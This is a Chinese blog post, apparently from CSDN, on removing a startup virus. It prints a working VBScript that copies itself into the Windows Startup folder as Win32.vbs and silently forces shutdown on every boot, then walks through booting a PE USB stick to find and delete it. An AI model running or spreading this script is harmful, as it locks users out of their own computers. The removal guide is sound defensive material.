如何删除开机自启动的病毒

P.S.(1)此文中的方法也适用于其他开机自启的病毒。

话说那年,那月,那一天,有一个大佬发了一篇博文 ,结果↓↓↓

啊!可怜的人!我们先来看看那个病毒:

on error resume next 
 
set wr=createobject("scripting.filesystemobject") 
 
set ws=createobject("wscript.shell") 
 
set f = wr.getfile(wscript.scriptfullname) 
 
q=ws.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup") 
 
if not f="Win32.vbs" then wr.copyfile f,q&"\Win32.vbs",true 
 
ws.run"shutdown -p",vbhide

运行一下:

 嗯,果然厉害,开了机就关机。

P.S.(2)这位大佬的病毒怎么样?厉不厉害?如果你想看其他病毒,那么请看此文

不过,还是有解决方法的:

1.打开电脑,狂摁F12(根据电脑机型可能有所不同)

2.插上启动U盘(怎么做启动U盘上网查),然后启动

(如是虚拟机,可能得reset一下(倒数第2项),然后再狂摁F12)

 

 (注:选中(↑、↓键)后摁Enter )

然后等着进度条跑完,最后是这样的:

现在电脑能使了,然后跟我来:

1. 我们分析一下病毒,发现它是通过修改‘HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup’注册表项来开机自启的。

2.然后我们打开C:\windows\regedit.exe,再打开

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup,发现无效(如图)。

 这是为什么呢?这是因为:注册表里压根没这一项(指PE模式)!

实际上,它是‘HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Startup’,其值为C:\Users\****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup。(注:****为你的用户名,并且,在PE模式中其值有所不同)

我们打开自己的用户文件夹,然后把‘\AppData’及以后的内容粘贴到导航栏里,如图:

然后,我们发现里面有一个VBS文件,将其删除即可。如图所示:

接着,重启电脑,如图:

 Great!电脑没事啦!!!

P.S.(3) 完成本博文共花了我约1个半小时的时间,非常辛苦,故如果此文帮到了你,请点赞+转发+打赏吧!

P.S.(4)(今天的P.S.真够多的) 版权所有,侵犯必究!

  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值